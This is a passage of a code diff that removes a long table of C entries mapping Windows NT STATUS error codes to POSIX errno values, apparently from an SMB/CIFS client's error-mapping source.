+-	{STATUS_INVALID_WORKSTATION, -EACCES, "STATUS_INVALID_WORKSTATION"},
+-	{STATUS_PASSWORD_EXPIRED, -EKEYEXPIRED, "STATUS_PASSWORD_EXPIRED"},
+-	{STATUS_ACCOUNT_DISABLED, -EKEYREVOKED, "STATUS_ACCOUNT_DISABLED"},
+-	{STATUS_NONE_MAPPED, -EIO, "STATUS_NONE_MAPPED"},
+-	{STATUS_TOO_MANY_LUIDS_REQUESTED, -EIO,
+-	"STATUS_TOO_MANY_LUIDS_REQUESTED"},
+-	{STATUS_LUIDS_EXHAUSTED, -EIO, "STATUS_LUIDS_EXHAUSTED"},
+-	{STATUS_INVALID_SUB_AUTHORITY, -EIO, "STATUS_INVALID_SUB_AUTHORITY"},
+-	{STATUS_INVALID_ACL, -EIO, "STATUS_INVALID_ACL"},
+-	{STATUS_INVALID_SID, -EIO, "STATUS_INVALID_SID"},
+-	{STATUS_INVALID_SECURITY_DESCR, -EIO, "STATUS_INVALID_SECURITY_DESCR"},
+-	{STATUS_PROCEDURE_NOT_FOUND, -EIO, "STATUS_PROCEDURE_NOT_FOUND"},
+-	{STATUS_INVALID_IMAGE_FORMAT, -EIO, "STATUS_INVALID_IMAGE_FORMAT"},
+-	{STATUS_NO_TOKEN, -EIO, "STATUS_NO_TOKEN"},
+-	{STATUS_BAD_INHERITANCE_ACL, -EIO, "STATUS_BAD_INHERITANCE_ACL"},
+-	{STATUS_RANGE_NOT_LOCKED, -EIO, "STATUS_RANGE_NOT_LOCKED"},
+-	{STATUS_DISK_FULL, -ENOSPC, "STATUS_DISK_FULL"},
+-	{STATUS_SERVER_DISABLED, -EIO, "STATUS_SERVER_DISABLED"},
+-	{STATUS_SERVER_NOT_DISABLED, -EIO, "STATUS_SERVER_NOT_DISABLED"},
+-	{STATUS_TOO_MANY_GUIDS_REQUESTED, -EIO,
+-	"STATUS_TOO_MANY_GUIDS_REQUESTED"},
+-	{STATUS_GUIDS_EXHAUSTED, -EIO, "STATUS_GUIDS_EXHAUSTED"},
+-	{STATUS_INVALID_ID_AUTHORITY, -EIO, "STATUS_INVALID_ID_AUTHORITY"},
+-	{STATUS_AGENTS_EXHAUSTED, -EIO, "STATUS_AGENTS_EXHAUSTED"},
+-	{STATUS_INVALID_VOLUME_LABEL, -EIO, "STATUS_INVALID_VOLUME_LABEL"},
+-	{STATUS_SECTION_NOT_EXTENDED, -EIO, "STATUS_SECTION_NOT_EXTENDED"},
+-	{STATUS_NOT_MAPPED_DATA, -EIO, "STATUS_NOT_MAPPED_DATA"},
+-	{STATUS_RESOURCE_DATA_NOT_FOUND, -EIO,
+-	"STATUS_RESOURCE_DATA_NOT_FOUND"},
+-	{STATUS_RESOURCE_TYPE_NOT_FOUND, -EIO,
+-	"STATUS_RESOURCE_TYPE_NOT_FOUND"},
+-	{STATUS_RESOURCE_NAME_NOT_FOUND, -EIO,
+-	"STATUS_RESOURCE_NAME_NOT_FOUND"},
+-	{STATUS_ARRAY_BOUNDS_EXCEEDED, -EIO, "STATUS_ARRAY_BOUNDS_EXCEEDED"},
+-	{STATUS_FLOAT_DENORMAL_OPERAND, -EIO, "STATUS_FLOAT_DENORMAL_OPERAND"},
+-	{STATUS_FLOAT_DIVIDE_BY_ZERO, -EIO, "STATUS_FLOAT_DIVIDE_BY_ZERO"},
+-	{STATUS_FLOAT_INEXACT_RESULT, -EIO, "STATUS_FLOAT_INEXACT_RESULT"},
+-	{STATUS_FLOAT_INVALID_OPERATION, -EIO,
+-	"STATUS_FLOAT_INVALID_OPERATION"},
+-	{STATUS_FLOAT_OVERFLOW, -EIO, "STATUS_FLOAT_OVERFLOW"},
+-	{STATUS_FLOAT_STACK_CHECK, -EIO, "STATUS_FLOAT_STACK_CHECK"},
+-	{STATUS_FLOAT_UNDERFLOW, -EIO, "STATUS_FLOAT_UNDERFLOW"},
+-	{STATUS_INTEGER_DIVIDE_BY_ZERO, -EIO, "STATUS_INTEGER_DIVIDE_BY_ZERO"},
+-	{STATUS_INTEGER_OVERFLOW, -EIO, "STATUS_INTEGER_OVERFLOW"},
+-	{STATUS_PRIVILEGED_INSTRUCTION, -EIO, "STATUS_PRIVILEGED_INSTRUCTION"},
+-	{STATUS_TOO_MANY_PAGING_FILES, -EIO, "STATUS_TOO_MANY_PAGING_FILES"},
+-	{STATUS_FILE_INVALID, -EIO, "STATUS_FILE_INVALID"},
+-	{STATUS_ALLOTTED_SPACE_EXCEEDED, -EIO,
+-	"STATUS_ALLOTTED_SPACE_EXCEEDED"},
+-	{STATUS_INSUFFICIENT_RESOURCES, -EAGAIN,
+-				"STATUS_INSUFFICIENT_RESOURCES"},
+-	{STATUS_DFS_EXIT_PATH_FOUND, -EIO, "STATUS_DFS_EXIT_PATH_FOUND"},
+-	{STATUS_DEVICE_DATA_ERROR, -EIO, "STATUS_DEVICE_DATA_ERROR"},
+-	{STATUS_DEVICE_NOT_CONNECTED, -EIO, "STATUS_DEVICE_NOT_CONNECTED"},
+-	{STATUS_DEVICE_POWER_FAILURE, -EIO, "STATUS_DEVICE_POWER_FAILURE"},
+-	{STATUS_FREE_VM_NOT_AT_BASE, -EIO, "STATUS_FREE_VM_NOT_AT_BASE"},
+-	{STATUS_MEMORY_NOT_ALLOCATED, -EFAULT, "STATUS_MEMORY_NOT_ALLOCATED"},
+-	{STATUS_WORKING_SET_QUOTA, -EIO, "STATUS_WORKING_SET_QUOTA"},
+-	{STATUS_MEDIA_WRITE_PROTECTED, -EROFS, "STATUS_MEDIA_WRITE_PROTECTED"},
+-	{STATUS_DEVICE_NOT_READY, -EIO, "STATUS_DEVICE_NOT_READY"},
+-	{STATUS_INVALID_GROUP_ATTRIBUTES, -EIO,
+-	"STATUS_INVALID_GROUP_ATTRIBUTES"},
+-	{STATUS_BAD_IMPERSONATION_LEVEL, -EIO,
+-	"STATUS_BAD_IMPERSONATION_LEVEL"},
+-	{STATUS_CANT_OPEN_ANONYMOUS, -EIO, "STATUS_CANT_OPEN_ANONYMOUS"},
+-	{STATUS_BAD_VALIDATION_CLASS, -EIO, "STATUS_BAD_VALIDATION_CLASS"},
+-	{STATUS_BAD_TOKEN_TYPE, -EIO, "STATUS_BAD_TOKEN_TYPE"},
+-	{STATUS_BAD_MASTER_BOOT_RECORD, -EIO, "STATUS_BAD_MASTER_BOOT_RECORD"},
+-	{STATUS_INSTRUCTION_MISALIGNMENT, -EIO,
+-	"STATUS_INSTRUCTION_MISALIGNMENT"},
+-	{STATUS_INSTANCE_NOT_AVAILABLE, -EIO, "STATUS_INSTANCE_NOT_AVAILABLE"},
+-	{STATUS_PIPE_NOT_AVAILABLE, -EIO, "STATUS_PIPE_NOT_AVAILABLE"},
+-	{STATUS_INVALID_PIPE_STATE, -EIO, "STATUS_INVALID_PIPE_STATE"},
+-	{STATUS_PIPE_BUSY, -EBUSY, "STATUS_PIPE_BUSY"},
+-	{STATUS_ILLEGAL_FUNCTION, -EIO, "STATUS_ILLEGAL_FUNCTION"},
+-	{STATUS_PIPE_DISCONNECTED, -EPIPE, "STATUS_PIPE_DISCONNECTED"},
+-	{STATUS_PIPE_CLOSING, -EIO, "STATUS_PIPE_CLOSING"},
+-	{STATUS_PIPE_CONNECTED, -EIO, "STATUS_PIPE_CONNECTED"},
+-	{STATUS_PIPE_LISTENING, -EIO, "STATUS_PIPE_LISTENING"},
+-	{STATUS_INVALID_READ_MODE, -EIO, "STATUS_INVALID_READ_MODE"},
+-	{STATUS_IO_TIMEOUT, -EAGAIN, "STATUS_IO_TIMEOUT"},
+-	{STATUS_FILE_FORCED_CLOSED, -EIO, "STATUS_FILE_FORCED_CLOSED"},
+-	{STATUS_PROFILING_NOT_STARTED, -EIO, "STATUS_PROFILING_NOT_STARTED"},
+-	{STATUS_PROFILING_NOT_STOPPED, -EIO, "STATUS_PROFILING_NOT_STOPPED"},
+-	{STATUS_COULD_NOT_INTERPRET, -EIO, "STATUS_COULD_NOT_INTERPRET"},
+-	{STATUS_FILE_IS_A_DIRECTORY, -EISDIR, "STATUS_FILE_IS_A_DIRECTORY"},
+-	{STATUS_NOT_SUPPORTED, -EOPNOTSUPP, "STATUS_NOT_SUPPORTED"},
+-	{STATUS_REMOTE_NOT_LISTENING, -EHOSTDOWN,
+-	"STATUS_REMOTE_NOT_LISTENING"},
+-	{STATUS_DUPLICATE_NAME, -ENOTUNIQ, "STATUS_DUPLICATE_NAME"},
+-	{STATUS_BAD_NETWORK_PATH, -EINVAL, "STATUS_BAD_NETWORK_PATH"},
+-	{STATUS_NETWORK_BUSY, -EBUSY, "STATUS_NETWORK_BUSY"},
+-	{STATUS_DEVICE_DOES_NOT_EXIST, -ENODEV, "STATUS_DEVICE_DOES_NOT_EXIST"},
+-	{STATUS_TOO_MANY_COMMANDS, -EIO, "STATUS_TOO_MANY_COMMANDS"},
+-	{STATUS_ADAPTER_HARDWARE_ERROR, -EIO, "STATUS_ADAPTER_HARDWARE_ERROR"},
+-	{STATUS_INVALID_NETWORK_RESPONSE, -EIO,
+-	"STATUS_INVALID_NETWORK_RESPONSE"},
+-	{STATUS_UNEXPECTED_NETWORK_ERROR, -EIO,
+-	"STATUS_UNEXPECTED_NETWORK_ERROR"},
+-	{STATUS_BAD_REMOTE_ADAPTER, -EIO, "STATUS_BAD_REMOTE_ADAPTER"},
+-	{STATUS_PRINT_QUEUE_FULL, -EIO, "STATUS_PRINT_QUEUE_FULL"},
+-	{STATUS_NO_SPOOL_SPACE, -EIO, "STATUS_NO_SPOOL_SPACE"},
+-	{STATUS_PRINT_CANCELLED, -EIO, "STATUS_PRINT_CANCELLED"},
+-	{STATUS_NETWORK_NAME_DELETED, -EREMCHG, "STATUS_NETWORK_NAME_DELETED"},
+-	{STATUS_NETWORK_ACCESS_DENIED, -EACCES, "STATUS_NETWORK_ACCESS_DENIED"},
+-	{STATUS_BAD_DEVICE_TYPE, -EIO, "STATUS_BAD_DEVICE_TYPE"},
+-	{STATUS_BAD_NETWORK_NAME, -ENOENT, "STATUS_BAD_NETWORK_NAME"},
+-	{STATUS_TOO_MANY_NAMES, -EIO, "STATUS_TOO_MANY_NAMES"},
+-	{STATUS_TOO_MANY_SESSIONS, -EIO, "STATUS_TOO_MANY_SESSIONS"},
+-	{STATUS_SHARING_PAUSED, -EIO, "STATUS_SHARING_PAUSED"},
+-	{STATUS_REQUEST_NOT_ACCEPTED, -EIO, "STATUS_REQUEST_NOT_ACCEPTED"},
+-	{STATUS_REDIRECTOR_PAUSED, -EIO, "STATUS_REDIRECTOR_PAUSED"},
+-	{STATUS_NET_WRITE_FAULT, -EIO, "STATUS_NET_WRITE_FAULT"},
+-	{STATUS_PROFILING_AT_LIMIT, -EIO, "STATUS_PROFILING_AT_LIMIT"},
+-	{STATUS_NOT_SAME_DEVICE, -EXDEV, "STATUS_NOT_SAME_DEVICE"},
+-	{STATUS_FILE_RENAMED, -EIO, "STATUS_FILE_RENAMED"},
+-	{STATUS_VIRTUAL_CIRCUIT_CLOSED, -EIO, "STATUS_VIRTUAL_CIRCUIT_CLOSED"},
+-	{STATUS_NO_SECURITY_ON_OBJECT, -EIO, "STATUS_NO_SECURITY_ON_OBJECT"},
+-	{STATUS_CANT_WAIT, -EIO, "STATUS_CANT_WAIT"},
+-	{STATUS_PIPE_EMPTY, -EIO, "STATUS_PIPE_EMPTY"},
+-	{STATUS_CANT_ACCESS_DOMAIN_INFO, -EIO,
+-	"STATUS_CANT_ACCESS_DOMAIN_INFO"},
+-	{STATUS_CANT_TERMINATE_SELF, -EIO, "STATUS_CANT_TERMINATE_SELF"},
+-	{STATUS_INVALID_SERVER_STATE, -EIO, "STATUS_INVALID_SERVER_STATE"},
+-	{STATUS_INVALID_DOMAIN_STATE, -EIO, "STATUS_INVALID_DOMAIN_STATE"},
+-	{STATUS_INVALID_DOMAIN_ROLE, -EIO, "STATUS_INVALID_DOMAIN_ROLE"},
+-	{STATUS_NO_SUCH_DOMAIN, -EIO, "STATUS_NO_SUCH_DOMAIN"},
+-	{STATUS_DOMAIN_EXISTS, -EIO, "STATUS_DOMAIN_EXISTS"},
+-	{STATUS_DOMAIN_LIMIT_EXCEEDED, -EIO, "STATUS_DOMAIN_LIMIT_EXCEEDED"},
+-	{STATUS_OPLOCK_NOT_GRANTED, -EIO, "STATUS_OPLOCK_NOT_GRANTED"},
+-	{STATUS_INVALID_OPLOCK_PROTOCOL, -EIO,
+-	"STATUS_INVALID_OPLOCK_PROTOCOL"},
+-	{STATUS_INTERNAL_DB_CORRUPTION, -EIO, "STATUS_INTERNAL_DB_CORRUPTION"},
+-	{STATUS_INTERNAL_ERROR, -EIO, "STATUS_INTERNAL_ERROR"},
+-	{STATUS_GENERIC_NOT_MAPPED, -EIO, "STATUS_GENERIC_NOT_MAPPED"},
+-	{STATUS_BAD_DESCRIPTOR_FORMAT, -EIO, "STATUS_BAD_DESCRIPTOR_FORMAT"},
+-	{STATUS_INVALID_USER_BUFFER, -EIO, "STATUS_INVALID_USER_BUFFER"},
+-	{STATUS_UNEXPECTED_IO_ERROR, -EIO, "STATUS_UNEXPECTED_IO_ERROR"},
+-	{STATUS_UNEXPECTED_MM_CREATE_ERR, -EIO,
+-	"STATUS_UNEXPECTED_MM_CREATE_ERR"},
+-	{STATUS_UNEXPECTED_MM_MAP_ERROR, -EIO,
+-	"STATUS_UNEXPECTED_MM_MAP_ERROR"},
+-	{STATUS_UNEXPECTED_MM_EXTEND_ERR, -EIO,
+-	"STATUS_UNEXPECTED_MM_EXTEND_ERR"},
+-	{STATUS_NOT_LOGON_PROCESS, -EIO, "STATUS_NOT_LOGON_PROCESS"},
+-	{STATUS_LOGON_SESSION_EXISTS, -EIO, "STATUS_LOGON_SESSION_EXISTS"},
+-	{STATUS_INVALID_PARAMETER_1, -EINVAL, "STATUS_INVALID_PARAMETER_1"},
+-	{STATUS_INVALID_PARAMETER_2, -EINVAL, "STATUS_INVALID_PARAMETER_2"},
+-	{STATUS_INVALID_PARAMETER_3, -EINVAL, "STATUS_INVALID_PARAMETER_3"},
+-	{STATUS_INVALID_PARAMETER_4, -EINVAL, "STATUS_INVALID_PARAMETER_4"},
+-	{STATUS_INVALID_PARAMETER_5, -EINVAL, "STATUS_INVALID_PARAMETER_5"},
+-	{STATUS_INVALID_PARAMETER_6, -EINVAL, "STATUS_INVALID_PARAMETER_6"},
+-	{STATUS_INVALID_PARAMETER_7, -EINVAL, "STATUS_INVALID_PARAMETER_7"},
+-	{STATUS_INVALID_PARAMETER_8, -EINVAL, "STATUS_INVALID_PARAMETER_8"},
+-	{STATUS_INVALID_PARAMETER_9, -EINVAL, "STATUS_INVALID_PARAMETER_9"},
+-	{STATUS_INVALID_PARAMETER_10, -EINVAL, "STATUS_INVALID_PARAMETER_10"},
+-	{STATUS_INVALID_PARAMETER_11, -EINVAL, "STATUS_INVALID_PARAMETER_11"},
+-	{STATUS_INVALID_PARAMETER_12, -EINVAL, "STATUS_INVALID_PARAMETER_12"},
+-	{STATUS_REDIRECTOR_NOT_STARTED, -EIO, "STATUS_REDIRECTOR_NOT_STARTED"},
+-	{STATUS_REDIRECTOR_STARTED, -EIO, "STATUS_REDIRECTOR_STARTED"},
+-	{STATUS_STACK_OVERFLOW, -EIO, "STATUS_STACK_OVERFLOW"},
+-	{STATUS_NO_SUCH_PACKAGE, -EIO, "STATUS_NO_SUCH_PACKAGE"},
+-	{STATUS_BAD_FUNCTION_TABLE, -EIO, "STATUS_BAD_FUNCTION_TABLE"},
+-	{STATUS_VARIABLE_NOT_FOUND, -EIO, "STATUS_VARIABLE_NOT_FOUND"},
+-	{STATUS_DIRECTORY_NOT_EMPTY, -ENOTEMPTY, "STATUS_DIRECTORY_NOT_EMPTY"},
+-	{STATUS_FILE_CORRUPT_ERROR, -EIO, "STATUS_FILE_CORRUPT_ERROR"},
+-	{STATUS_NOT_A_DIRECTORY, -ENOTDIR, "STATUS_NOT_A_DIRECTORY"},
+-	{STATUS_BAD_LOGON_SESSION_STATE, -EIO,
+-	"STATUS_BAD_LOGON_SESSION_STATE"},
+-	{STATUS_LOGON_SESSION_COLLISION, -EIO,
+-	"STATUS_LOGON_SESSION_COLLISION"},
+-	{STATUS_NAME_TOO_LONG, -ENAMETOOLONG, "STATUS_NAME_TOO_LONG"},
+-	{STATUS_FILES_OPEN, -EIO, "STATUS_FILES_OPEN"},
+-	{STATUS_CONNECTION_IN_USE, -EIO, "STATUS_CONNECTION_IN_USE"},
+-	{STATUS_MESSAGE_NOT_FOUND, -EIO, "STATUS_MESSAGE_NOT_FOUND"},
+-	{STATUS_PROCESS_IS_TERMINATING, -EIO, "STATUS_PROCESS_IS_TERMINATING"},
+-	{STATUS_INVALID_LOGON_TYPE, -EIO, "STATUS_INVALID_LOGON_TYPE"},
+-	{STATUS_NO_GUID_TRANSLATION, -EIO, "STATUS_NO_GUID_TRANSLATION"},
+-	{STATUS_CANNOT_IMPERSONATE, -EIO, "STATUS_CANNOT_IMPERSONATE"},
+-	{STATUS_IMAGE_ALREADY_LOADED, -EIO, "STATUS_IMAGE_ALREADY_LOADED"},
+-	{STATUS_ABIOS_NOT_PRESENT, -EIO, "STATUS_ABIOS_NOT_PRESENT"},
+-	{STATUS_ABIOS_LID_NOT_EXIST, -EIO, "STATUS_ABIOS_LID_NOT_EXIST"},
+-	{STATUS_ABIOS_LID_ALREADY_OWNED, -EIO,
+-	"STATUS_ABIOS_LID_ALREADY_OWNED"},
+-	{STATUS_ABIOS_NOT_LID_OWNER, -EIO, "STATUS_ABIOS_NOT_LID_OWNER"},
+-	{STATUS_ABIOS_INVALID_COMMAND, -EIO, "STATUS_ABIOS_INVALID_COMMAND"},
+-	{STATUS_ABIOS_INVALID_LID, -EIO, "STATUS_ABIOS_INVALID_LID"},
+-	{STATUS_ABIOS_SELECTOR_NOT_AVAILABLE, -EIO,
+-	"STATUS_ABIOS_SELECTOR_NOT_AVAILABLE"},
+-	{STATUS_ABIOS_INVALID_SELECTOR, -EIO, "STATUS_ABIOS_INVALID_SELECTOR"},
+-	{STATUS_NO_LDT, -EIO, "STATUS_NO_LDT"},
+-	{STATUS_INVALID_LDT_SIZE, -EIO, "STATUS_INVALID_LDT_SIZE"},
+-	{STATUS_INVALID_LDT_OFFSET, -EIO, "STATUS_INVALID_LDT_OFFSET"},
+-	{STATUS_INVALID_LDT_DESCRIPTOR, -EIO, "STATUS_INVALID_LDT_DESCRIPTOR"},
+-	{STATUS_INVALID_IMAGE_NE_FORMAT, -EIO,
+-	"STATUS_INVALID_IMAGE_NE_FORMAT"},
+-	{STATUS_RXACT_INVALID_STATE, -EIO, "STATUS_RXACT_INVALID_STATE"},
+-	{STATUS_RXACT_COMMIT_FAILURE, -EIO, "STATUS_RXACT_COMMIT_FAILURE"},
+-	{STATUS_MAPPED_FILE_SIZE_ZERO, -EIO, "STATUS_MAPPED_FILE_SIZE_ZERO"},
+-	{STATUS_TOO_MANY_OPENED_FILES, -EMFILE, "STATUS_TOO_MANY_OPENED_FILES"},
+-	{STATUS_CANCELLED, -EIO, "STATUS_CANCELLED"},
+-	{STATUS_CANNOT_DELETE, -EACCES, "STATUS_CANNOT_DELETE"},
+-	{STATUS_INVALID_COMPUTER_NAME, -EIO, "STATUS_INVALID_COMPUTER_NAME"},
+-	{STATUS_FILE_DELETED, -EIO, "STATUS_FILE_DELETED"},
+-	{STATUS_SPECIAL_ACCOUNT, -EIO, "STATUS_SPECIAL_ACCOUNT"},
+-	{STATUS_SPECIAL_GROUP, -EIO, "STATUS_SPECIAL_GROUP"},
+-	{STATUS_SPECIAL_USER, -EIO, "STATUS_SPECIAL_USER"},
+-	{STATUS_MEMBERS_PRIMARY_GROUP, -EIO, "STATUS_MEMBERS_PRIMARY_GROUP"},
+-	{STATUS_FILE_CLOSED, -EBADF, "STATUS_FILE_CLOSED"},
+-	{STATUS_TOO_MANY_THREADS, -EIO, "STATUS_TOO_MANY_THREADS"},
+-	{STATUS_THREAD_NOT_IN_PROCESS, -EIO, "STATUS_THREAD_NOT_IN_PROCESS"},
+-	{STATUS_TOKEN_ALREADY_IN_USE, -EIO, "STATUS_TOKEN_ALREADY_IN_USE"},
+-	{STATUS_PAGEFILE_QUOTA_EXCEEDED, -EDQUOT,
+-	"STATUS_PAGEFILE_QUOTA_EXCEEDED"},
+-	{STATUS_COMMITMENT_LIMIT, -EIO, "STATUS_COMMITMENT_LIMIT"},
+-	{STATUS_INVALID_IMAGE_LE_FORMAT, -EIO,
+-	"STATUS_INVALID_IMAGE_LE_FORMAT"},
+-	{STATUS_INVALID_IMAGE_NOT_MZ, -EIO, "STATUS_INVALID_IMAGE_NOT_MZ"},
+-	{STATUS_INVALID_IMAGE_PROTECT, -EIO, "STATUS_INVALID_IMAGE_PROTECT"},
+-	{STATUS_INVALID_IMAGE_WIN_16, -EIO, "STATUS_INVALID_IMAGE_WIN_16"},
+-	{STATUS_LOGON_SERVER_CONFLICT, -EIO, "STATUS_LOGON_SERVER_CONFLICT"},
+-	{STATUS_TIME_DIFFERENCE_AT_DC, -EIO, "STATUS_TIME_DIFFERENCE_AT_DC"},
+-	{STATUS_SYNCHRONIZATION_REQUIRED, -EIO,
+-	"STATUS_SYNCHRONIZATION_REQUIRED"},
+-	{STATUS_DLL_NOT_FOUND, -ENOENT, "STATUS_DLL_NOT_FOUND"},
+-	{STATUS_OPEN_FAILED, -EIO, "STATUS_OPEN_FAILED"},
+-	{STATUS_IO_PRIVILEGE_FAILED, -EIO, "STATUS_IO_PRIVILEGE_FAILED"},
+-	{STATUS_ORDINAL_NOT_FOUND, -EIO, "STATUS_ORDINAL_NOT_FOUND"},
+-	{STATUS_ENTRYPOINT_NOT_FOUND, -EIO, "STATUS_ENTRYPOINT_NOT_FOUND"},
+-	{STATUS_CONTROL_C_EXIT, -EIO, "STATUS_CONTROL_C_EXIT"},
+-	{STATUS_LOCAL_DISCONNECT, -EIO, "STATUS_LOCAL_DISCONNECT"},
+-	{STATUS_REMOTE_DISCONNECT, -ESHUTDOWN, "STATUS_REMOTE_DISCONNECT"},
+-	{STATUS_REMOTE_RESOURCES, -EIO, "STATUS_REMOTE_RESOURCES"},
+-	{STATUS_LINK_FAILED, -EXDEV, "STATUS_LINK_FAILED"},
+-	{STATUS_LINK_TIMEOUT, -ETIMEDOUT, "STATUS_LINK_TIMEOUT"},
+-	{STATUS_INVALID_CONNECTION, -EIO, "STATUS_INVALID_CONNECTION"},
+-	{STATUS_INVALID_ADDRESS, -EIO, "STATUS_INVALID_ADDRESS"},
+-	{STATUS_DLL_INIT_FAILED, -EIO, "STATUS_DLL_INIT_FAILED"},
+-	{STATUS_MISSING_SYSTEMFILE, -EIO, "STATUS_MISSING_SYSTEMFILE"},
+-	{STATUS_UNHANDLED_EXCEPTION, -EIO, "STATUS_UNHANDLED_EXCEPTION"},
+-	{STATUS_APP_INIT_FAILURE, -EIO, "STATUS_APP_INIT_FAILURE"},
+-	{STATUS_PAGEFILE_CREATE_FAILED, -EIO, "STATUS_PAGEFILE_CREATE_FAILED"},
+-	{STATUS_NO_PAGEFILE, -EIO, "STATUS_NO_PAGEFILE"},
+-	{STATUS_INVALID_LEVEL, -EIO, "STATUS_INVALID_LEVEL"},
+-	{STATUS_WRONG_PASSWORD_CORE, -EIO, "STATUS_WRONG_PASSWORD_CORE"},
+-	{STATUS_ILLEGAL_FLOAT_CONTEXT, -EIO, "STATUS_ILLEGAL_FLOAT_CONTEXT"},
+-	{STATUS_PIPE_BROKEN, -EPIPE, "STATUS_PIPE_BROKEN"},
+-	{STATUS_REGISTRY_CORRUPT, -EIO, "STATUS_REGISTRY_CORRUPT"},
+-	{STATUS_REGISTRY_IO_FAILED, -EIO, "STATUS_REGISTRY_IO_FAILED"},
+-	{STATUS_NO_EVENT_PAIR, -EIO, "STATUS_NO_EVENT_PAIR"},
+-	{STATUS_UNRECOGNIZED_VOLUME, -EIO, "STATUS_UNRECOGNIZED_VOLUME"},
+-	{STATUS_SERIAL_NO_DEVICE_INITED, -EIO,
+-	"STATUS_SERIAL_NO_DEVICE_INITED"},
+-	{STATUS_NO_SUCH_ALIAS, -EIO, "STATUS_NO_SUCH_ALIAS"},
+-	{STATUS_MEMBER_NOT_IN_ALIAS, -EIO, "STATUS_MEMBER_NOT_IN_ALIAS"},
+-	{STATUS_MEMBER_IN_ALIAS, -EIO, "STATUS_MEMBER_IN_ALIAS"},
+-	{STATUS_ALIAS_EXISTS, -EIO, "STATUS_ALIAS_EXISTS"},
+-	{STATUS_LOGON_NOT_GRANTED, -EIO, "STATUS_LOGON_NOT_GRANTED"},
+-	{STATUS_TOO_MANY_SECRETS, -EIO, "STATUS_TOO_MANY_SECRETS"},
+-	{STATUS_SECRET_TOO_LONG, -EIO, "STATUS_SECRET_TOO_LONG"},
+-	{STATUS_INTERNAL_DB_ERROR, -EIO, "STATUS_INTERNAL_DB_ERROR"},
+-	{STATUS_FULLSCREEN_MODE, -EIO, "STATUS_FULLSCREEN_MODE"},
+-	{STATUS_TOO_MANY_CONTEXT_IDS, -EIO, "STATUS_TOO_MANY_CONTEXT_IDS"},
+-	{STATUS_LOGON_TYPE_NOT_GRANTED, -EIO, "STATUS_LOGON_TYPE_NOT_GRANTED"},
+-	{STATUS_NOT_REGISTRY_FILE, -EIO, "STATUS_NOT_REGISTRY_FILE"},
+-	{STATUS_NT_CROSS_ENCRYPTION_REQUIRED, -EIO,
+-	"STATUS_NT_CROSS_ENCRYPTION_REQUIRED"},
+-	{STATUS_DOMAIN_CTRLR_CONFIG_ERROR, -EIO,
+-	"STATUS_DOMAIN_CTRLR_CONFIG_ERROR"},
+-	{STATUS_FT_MISSING_MEMBER, -EIO, "STATUS_FT_MISSING_MEMBER"},
+-	{STATUS_ILL_FORMED_SERVICE_ENTRY, -EIO,
+-	"STATUS_ILL_FORMED_SERVICE_ENTRY"},
+-	{STATUS_ILLEGAL_CHARACTER, -EIO, "STATUS_ILLEGAL_CHARACTER"},
+-	{STATUS_UNMAPPABLE_CHARACTER, -EIO, "STATUS_UNMAPPABLE_CHARACTER"},
+-	{STATUS_UNDEFINED_CHARACTER, -EIO, "STATUS_UNDEFINED_CHARACTER"},
+-	{STATUS_FLOPPY_VOLUME, -EIO, "STATUS_FLOPPY_VOLUME"},
+-	{STATUS_FLOPPY_ID_MARK_NOT_FOUND, -EIO,
+-	"STATUS_FLOPPY_ID_MARK_NOT_FOUND"},
+-	{STATUS_FLOPPY_WRONG_CYLINDER, -EIO, "STATUS_FLOPPY_WRONG_CYLINDER"},
+-	{STATUS_FLOPPY_UNKNOWN_ERROR, -EIO, "STATUS_FLOPPY_UNKNOWN_ERROR"},
+-	{STATUS_FLOPPY_BAD_REGISTERS, -EIO, "STATUS_FLOPPY_BAD_REGISTERS"},
+-	{STATUS_DISK_RECALIBRATE_FAILED, -EIO,
+-	"STATUS_DISK_RECALIBRATE_FAILED"},
+-	{STATUS_DISK_OPERATION_FAILED, -EIO, "STATUS_DISK_OPERATION_FAILED"},
+-	{STATUS_DISK_RESET_FAILED, -EIO, "STATUS_DISK_RESET_FAILED"},
+-	{STATUS_SHARED_IRQ_BUSY, -EBUSY, "STATUS_SHARED_IRQ_BUSY"},
+-	{STATUS_FT_ORPHANING, -EIO, "STATUS_FT_ORPHANING"},
+-	{STATUS_BIOS_FAILED_TO_CONNECT_INTERRUPT, -EIO,
+-	"STATUS_BIOS_FAILED_TO_CONNECT_INTERRUPT"},
+-	{STATUS_PARTITION_FAILURE, -EIO, "STATUS_PARTITION_FAILURE"},
+-	{STATUS_INVALID_BLOCK_LENGTH, -EIO, "STATUS_INVALID_BLOCK_LENGTH"},
+-	{STATUS_DEVICE_NOT_PARTITIONED, -EIO, "STATUS_DEVICE_NOT_PARTITIONED"},
+-	{STATUS_UNABLE_TO_LOCK_MEDIA, -EIO, "STATUS_UNABLE_TO_LOCK_MEDIA"},
+-	{STATUS_UNABLE_TO_UNLOAD_MEDIA, -EIO, "STATUS_UNABLE_TO_UNLOAD_MEDIA"},
+-	{STATUS_EOM_OVERFLOW, -EIO, "STATUS_EOM_OVERFLOW"},
+-	{STATUS_NO_MEDIA, -EIO, "STATUS_NO_MEDIA"},
+-	{STATUS_NO_SUCH_MEMBER, -EIO, "STATUS_NO_SUCH_MEMBER"},
+-	{STATUS_INVALID_MEMBER, -EIO, "STATUS_INVALID_MEMBER"},
+-	{STATUS_KEY_DELETED, -EIO, "STATUS_KEY_DELETED"},
+-	{STATUS_NO_LOG_SPACE, -EIO, "STATUS_NO_LOG_SPACE"},
+-	{STATUS_TOO_MANY_SIDS, -EIO, "STATUS_TOO_MANY_SIDS"},
+-	{STATUS_LM_CROSS_ENCRYPTION_REQUIRED, -EIO,
+-	"STATUS_LM_CROSS_ENCRYPTION_REQUIRED"},
+-	{STATUS_KEY_HAS_CHILDREN, -EIO, "STATUS_KEY_HAS_CHILDREN"},
+-	{STATUS_CHILD_MUST_BE_VOLATILE, -EIO, "STATUS_CHILD_MUST_BE_VOLATILE"},
+-	{STATUS_DEVICE_CONFIGURATION_ERROR, -EIO,
+-	"STATUS_DEVICE_CONFIGURATION_ERROR"},
+-	{STATUS_DRIVER_INTERNAL_ERROR, -EIO, "STATUS_DRIVER_INTERNAL_ERROR"},
+-	{STATUS_INVALID_DEVICE_STATE, -EIO, "STATUS_INVALID_DEVICE_STATE"},
+-	{STATUS_IO_DEVICE_ERROR, -EIO, "STATUS_IO_DEVICE_ERROR"},
+-	{STATUS_DEVICE_PROTOCOL_ERROR, -EIO, "STATUS_DEVICE_PROTOCOL_ERROR"},
+-	{STATUS_BACKUP_CONTROLLER, -EIO, "STATUS_BACKUP_CONTROLLER"},
+-	{STATUS_LOG_FILE_FULL, -EIO, "STATUS_LOG_FILE_FULL"},
